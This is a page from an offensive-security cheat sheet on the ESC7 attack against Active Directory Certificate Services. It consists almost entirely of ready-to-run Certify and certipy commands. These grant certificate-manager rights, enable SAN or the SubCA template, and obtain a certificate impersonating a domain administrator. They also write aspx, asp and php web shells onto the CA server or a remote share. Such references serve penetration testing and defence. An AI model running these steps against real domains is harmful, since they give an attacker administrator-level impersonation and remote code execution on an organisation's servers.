ad-adcs-esc07.md (3028B)
1 --- 2 title: "Active Directory - Certificate ESC7" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/ad-adcs-esc07.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-adcs-esc07.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Active Directory - Certificate ESC7 12 13 ## ESC7 - Vulnerable Certificate Authority Access Control 14 15 **Exploitation** 16 17 * Detect CAs that allow low privileged users the `ManageCA` or `Manage Certificates` permissions 18 19 ```ps1 20 Certify.exe find /vulnerable 21 # or 22 certipy find -enabled -u user@domain.local -p password -dc-ip 10.10.10.10 23 24 # add "Manage Certificates" privilege 25 certipy ca -ca 'DOMAIN-CA' -username user@domain.local -p GoldCrown -add-officer user -dc-ip 10.10.10.10 -target-ip 10.10.10.11 26 ``` 27 28 * Change the CA settings to enable the SAN extension for all the templates under the vulnerable CA (ESC6) 29 30 ```ps1 31 Certify.exe setconfig /enablesan /restart 32 ``` 33 34 * Request the certificate with the desired SAN. 35 36 ```ps1 37 Certify.exe request /template:User /altname:super.adm 38 ``` 39 40 * Grant approval if required or disable the approval requirement 41 42 ```ps1 43 # Grant 44 Certify.exe issue /id:[REQUEST ID] 45 # Disable 46 Certify.exe setconfig /removeapproval /restart 47 ``` 48 49 **Exploitation 2**: 50 51 Alternative exploitation from **ManageCA** to **RCE** on ADCS server: 52 53 ```ps1 54 # Get the current CDP list. Useful to find remote writable shares: 55 Certify.exe writefile /ca:SERVER\ca-name /readonly 56 57 # Write an aspx shell to a local web directory: 58 Certify.exe writefile /ca:SERVER\ca-name /path:C:\Windows\SystemData\CES\CA-Name\shell.aspx /input:C:\Local\Path\shell.aspx 59 60 # Write the default asp shell to a local web directory: 61 Certify.exe writefile /ca:SERVER\ca-name /path:c:\inetpub\wwwroot\shell.asp 62 63 # Write a php shell to a remote web directory: 64 Certify.exe writefile /ca:SERVER\ca-name /path:\\remote.server\share\shell.php /input:C:\Local\path\shell.php 65 ``` 66 67 **Exploitation 3**: 68 69 ```ps1 70 # enable SubCA template 71 certipy ca -ca 'DOMAIN-CA' -enable-template 'SubCA' -username user@domain.local -p password -dc-ip 10.10.10.10 -target-ip 10.10.10.11 72 73 # request a certificate based on subCA template 74 certipy req -ca 'DOMAIN-CA' -username user@domain.local -p password -dc-ip 10.10.10.10 -target-ip 10.10.10.11 -template SubCA -upn administrator@domain.local 75 76 # issue failed certificate request 77 certipy ca -ca 'DOMAIN-CA' -issue-request 7 -username user@domain.local -p password -dc-ip 10.10.10.10 -target-ip 10.10.10.11 78 79 # retrieve the issued certificate 80 certipy req -ca 'DOMAIN-CA' -username user@domain.local -p password -dc-ip 10.10.10.10 -target-ip 10.10.10.11 -retrieve 7 81 ``` 82 83 ## References 84 85 * [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/) 86 * [GOAD - part 14 - ADCS 5/7/9/10/11/13/14/15 - Mayfly - March 10, 2025](https://mayfly277.github.io/posts/ADCS-part14/)